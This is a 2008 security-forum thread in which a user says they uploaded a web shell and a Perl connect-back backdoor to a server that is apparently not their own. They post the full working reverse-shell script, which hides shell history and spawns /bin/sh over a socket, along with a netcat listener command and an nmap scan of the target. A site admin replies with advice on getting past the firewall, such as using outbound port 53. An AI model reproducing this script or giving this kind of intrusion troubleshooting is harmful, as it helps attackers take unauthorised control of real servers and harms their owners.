Login or Register ::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  :: April 19, 2024 Menu  Home  Logout  Discussions  Forums  Members List  IRC chat  Tools  Base64 coder  MD5 hash  CRC32 checksum  ROT13 coder  SHA-1 hash  URL-decoder  Sql Char Encoder  Affiliates  y3dips ITsec  Md5 Cracker  User Manuals  AlbumNow  Content  Content  Sections  FAQ  Top  Info  Feedback  Recommend Us  Search  Journal  Your Account User Info Welcome, Anonymous Nickname Password (Register) Membership: Latest: MichaelSnaRe New Today: 0 New Yesterday: 0 Overall: 9145 People Online: Visitors: 610 Members: 0 Total: 610 PacketStorm News ·301 Moved Permanently read more... Author Message hottox Posted: Sun Nov 23, 2008 3:13 pm    Post subject: here is some information about the target: Software: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635. PHP/5.2.6 Code: System Info: Linux 2.6.27-6_1.intel.BHsmp #1 SMP Thu Nov 13 15:27:29 MST 2008 x86_64 Disabled functions: NONE cURL: ON Register globals: OFF MySQL: ON MSSQL: OFF PostgreSQL: ON Oracle: OFF  Safe-mode: OFF (not secure) [/code] ?????????????????????? waraxe Posted: Sun Nov 23, 2008 2:35 pm    Post subject: If you are sure, that your PC can be reached from Internet, then try to use TCP port 53 instead of 2121. Because webserver needs this port for outgoing DNS requests, then it may be useable for your intentions. That's if target's network-level security is not tighter. hottox Posted: Sun Nov 23, 2008 2:28 pm    Post subject: it's the target's scan, port is open, and the firewall is disabled, waraxe Posted: Sun Nov 23, 2008 2:14 pm    Post subject: What computer did you scan? Webserver? I meant your own PC, where NC is in listening mode. http://www.emule-project.net/home/perl/general.cgi?rm=porttest&tcpport=2121 hottox Posted: Sun Nov 23, 2008 2:00 pm    Post subject: here is the result of Intense scan, all TCP ports,with nmap: Code: PORT      STATE  SERVICE         VERSION 20/tcp    closed ftp-data 21/tcp    open   ftp             PureFTPd |_ FTP bounce check: no banner 22/tcp    open   ssh             OpenSSH 3.9p1 (protocol 2.0) 25/tcp    open   smtp            Exim smtpd 4.69 26/tcp    open   smtp            Exim smtpd 4.69 53/tcp    closed domain 80/tcp    open   http            Apache httpd 2.2.9 ((Unix) mod_ssl/2.2.9 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635) |_ HTML title: HostMonster - Web hosting 110/tcp   open   pop3            Dovecot pop3d |_ POP3 Capabilites:  USER CAPA RESP-CODES UIDL PIPELINING STLS TOP SASL(PLAIN) 113/tcp   closed auth 143/tcp   open   imap            Dovecot imapd 443/tcp   open   ssl/http        Apache httpd 2.2.9 ((Unix) mod_ssl/2.2.9 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635) 465/tcp   open   ssl/smtp        Exim smtpd 4.69 |_ SSLv2: server still supports SSLv2 993/tcp   open   ssl/imap        Dovecot imapd |_ SSLv2: server still supports SSLv2 995/tcp   open   ssl/pop3        Dovecot pop3d |_ SSLv2: server still supports SSLv2 1167/tcp  closed unknown 2077/tcp  open   unknown 2078/tcp  open   ssl/unknown |_ SSLv2: server still supports SSLv2 2082/tcp  open   http            cPanel httpd 11.23.6 |  HTTP Auth: HTTP Service requires authentication |_   Auth type: Basic, realm = cPanel |_ HTML title: cPanel® 11 2083/tcp  open   ssl/http        cPanel httpd 11.23.6 |_ SSLv2: server still supports SSLv2 |_ HTML title: cPanel® 11 |  HTTP Auth: HTTP Service requires authentication |_   Auth type: Basic, realm = cPanel 2084/tcp  open   http            cPanel EntropyChat httpd 0.2.6 |_ HTML title: Site doesn't have a title. |_ robots.txt: is empty or has no disallowed entries 2085/tcp  closed unknown 2086/tcp  open   http            cPanel httpd 11.23.6 |_ HTML title: cPanel® 11 |  HTTP Auth: HTTP Service requires authentication |_   Auth type: Basic, realm = Web Host Manager 2087/tcp  open   ssl/http        cPanel httpd 11.23.6 |_ SSLv2: server still supports SSLv2 |_ HTML title: cPanel® 11 |  HTTP Auth: HTTP Service requires authentication |_   Auth type: Basic, realm = Web Host Manager 2088/tcp  closed unknown 2089/tcp  closed unknown 2090/tcp  closed unknown 2091/tcp  closed unknown 2092/tcp  closed unknown 2093/tcp  closed unknown 2094/tcp  closed unknown 2095/tcp  open   http            cPanel httpd 11.23.6 |_ HTML title: cPanel® 11 |  HTTP Auth: HTTP Service requires authentication |_   Auth type: Basic, realm = WebMail 2096/tcp  open   ssl/http        cPanel httpd 11.23.6 |_ SSLv2: server still supports SSLv2 |_ HTML title: cPanel® 11 |  HTTP Auth: HTTP Service requires authentication |_   Auth type: Basic, realm = WebMail 2097/tcp  closed unknown 6666/tcp  closed irc 8082/tcp  closed blackice-alerts 8083/tcp  closed unknown 8585/tcp  closed unknown 8586/tcp  closed unknown 19638/tcp closed unknown Code: waraxe Posted: Sun Nov 23, 2008 1:51 pm    Post subject: This can be firewalling issue on webserver's side. Try common ports like 53,80, ... And are you sure that your port 2121 is open on your side? No firewall? No router/NAT between? Maybe you need port forward. I suggest to run NC in listening mode on your PC and then use some online port scanner and see, if your open port is reachable from the Internet. hottox Posted: Sun Nov 23, 2008 1:33 pm    Post subject: Need HELP, perl reverse shell ..... Hi everybody, so, this is my probleme, i uploaded a shell on a server, then i uploaded a perl backdoor "chmod 0755", script: Code: #!/usr/bin/perl use IO::Socket; #cONNECT BACKDOOR EDITED BY XORON          #lord@SlackwareLinux:/home/programing$ perl dc.pl #--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- # #Usage: dc.pl [Host] [Port] # #Ex: dc.pl 127.0.0.1 2121 #lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121 #--== ConnectBack Backdoor Shell EDITED BY XORON TURK?SH HACKER ==-- # #[*] Resolving HostName #[*] Connecting... 127.0.0.1 #[*] Spawning Shell #[*] Connected to remote host #bash-2.05b# nc -vv -l -p 2121 #listening on [any] 2121 ... #connect to [127.0.0.1] from localhost [127.0.0.1] 32769 #--== ConnectBack Backdoor Shell EDITED BY XORON TURK?SH HACKER ==-- # #--==Systeminfo==-- #Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux # #--==Userinfo==-- #uid=1001(xoron) gid=100(users) groups=100(users) # #--==Directory==-- #/root # #--==Shell==-- # $system    = '/bin/sh'; $ARGC=@ARGV; print "--== ConnectBack Backdoor Shell EDITED BY XORON TURK?SH HACKER ==-- \n\n"; if ($ARGC!=2) {   print "Usage: $0 [Host] [Port] \n\n";   die "Ex: $0 127.0.0.1 2121 \n"; } use Socket; use FileHandle; socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n"; connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n"; print "[*] Resolving HostName\n"; print "[*] Connecting... $ARGV[0] \n"; print "[*] Spawning Shell \n"; print "[*] Connected to remote host \n"; SOCKET->autoflush(); open(STDIN, ">&SOCKET"); open(STDOUT,">&SOCKET"); open(STDERR,">&SOCKET"); print "--== ConnectBack Backdoor Shell EDITED BY XORON TURK?SH HACKER ==--  \n\n"; system("unset HISTFILE; unset SAVEHIST;echo --==Systeminfo==--; uname -a;echo; echo --==Userinfo==--; id;echo;echo --==Directory==--; pwd;echo; echo --==Shell==-- "); system($system); #EOF i run netcat: Code: nc -vv -l -p 2121 then, via the php shell: Code: perl dc.pl [My ip] [port] and the result : Unable to Connect Host. I tested the script on the localhost and I had a shell, i need your help to solve that problem. Waiting for reply